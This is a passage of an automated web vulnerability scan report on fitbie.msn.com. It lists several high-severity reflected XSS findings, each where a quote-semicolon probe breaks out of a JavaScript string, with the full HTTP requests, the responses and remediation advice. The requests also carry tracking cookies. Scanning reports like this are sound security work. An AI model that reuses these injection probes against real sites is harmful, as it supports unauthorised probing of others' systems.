Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:34:30 +0000
ETag: "1297607670-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:34:31 GMT
Date: Sun, 13 Feb 2011 14:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/women2ff36';29b10a83ad4?destination=node%2Fwomen2ff36';29b10a83ad4&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.13. http://fitbie.msn.com/get-fit/yoga [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /get-fit/yoga

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf23c'%3b9ce66478957 was submitted in the REST URL parameter 2. This input was echoed as cf23c';9ce66478957 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /get-fit/yogacf23c'%3b9ce66478957 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:33:40 +0000
ETag: "1297607620-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:33:41 GMT
Date: Sun, 13 Feb 2011 14:33:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/yogacf23c';9ce66478957?destination=node%2Fyogacf23c';9ce66478957&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.14. http://fitbie.msn.com/look-and-feel-thinner/3-abs-myths-busted [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /look-and-feel-thinner/3-abs-myths-busted

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 520e5'%3be1436a39e19 was submitted in the REST URL parameter 2. This input was echoed as 520e5';e1436a39e19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /look-and-feel-thinner/3-abs-myths-busted520e5'%3be1436a39e19 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:36 +0000
ETag: "1297607796-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:37 GMT
Date: Sun, 13 Feb 2011 14:36:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/3-abs-myths-busted520e5';e1436a39e19?destination=node%2F3-abs-myths-busted520e5';e1436a39e19&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.15. http://fitbie.msn.com/lose-weight/after [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /lose-weight/after

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4ce9'%3b144e2b0f49e was submitted in the REST URL parameter 2. This input was echoed as f4ce9';144e2b0f49e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lose-weight/afterf4ce9'%3b144e2b0f49e HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:52 +0000
ETag: "1297607392-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:52 GMT
Date: Sun, 13 Feb 2011 14:29:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/afterf4ce9';144e2b0f49e?destination=node%2Fafterf4ce9';144e2b0f49e&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.16. http://fitbie.msn.com/lose-weight/fat-burning-workouts [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /lose-weight/fat-burning-workouts

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9871a'%3b0661b3de472 was submitted in the REST URL parameter 2. This input was echoed as 9871a';0661b3de472 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lose-weight/fat-burning-workouts9871a'%3b0661b3de472 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:30 +0000
ETag: "1297607370-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:31 GMT
Date: Sun, 13 Feb 2011 14:29:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/fat-burning-workouts9871a';0661b3de472?destination=node%2Ffat-burning-workouts9871a';0661b3de472&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.17. http://fitbie.msn.com/meal-plan/lose-weight-400-calorie-meals [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /meal-plan/lose-weight-400-calorie-meals

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e17ae'%3bd1e8119ba81 was submitted in the REST URL parameter 2. This input was echoed as e17ae';d1e8119ba81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /meal-plan/lose-weight-400-calorie-mealse17ae'%3bd1e8119ba81 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:41 +0000
ETag: "1297607801-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:41 GMT
Date: Sun, 13 Feb 2011 14:36:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/lose-weight-400-calorie-mealse17ae';d1e8119ba81?destination=node%2Flose-weight-400-calorie-mealse17ae';d1e8119ba81&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.18. http://fitbie.msn.com/men/toughness-challenge [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /men/toughness-challenge

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 900d6'%3b86f84f9e572 was submitted in the REST URL parameter 2. This input was echoed as 900d6';86f84f9e572 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/toughness-challenge900d6'%3b86f84f9e572 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:38:01 +0000
ETag: "1297607881-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:38:01 GMT
Date: Sun, 13 Feb 2011 14:38:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/toughness-challenge900d6';86f84f9e572?destination=node%2Ftoughness-challenge900d6';86f84f9e572&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.19. http://fitbie.msn.com/misc/drupal.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be070'%3b5b4d8fa22b6 was submitted in the REST URL parameter 2. This input was echoed as be070';5b4d8fa22b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/drupal.jsbe070'%3b5b4d8fa22b6?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:05 GMT
Date: Sun, 13 Feb 2011 14:18:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50460

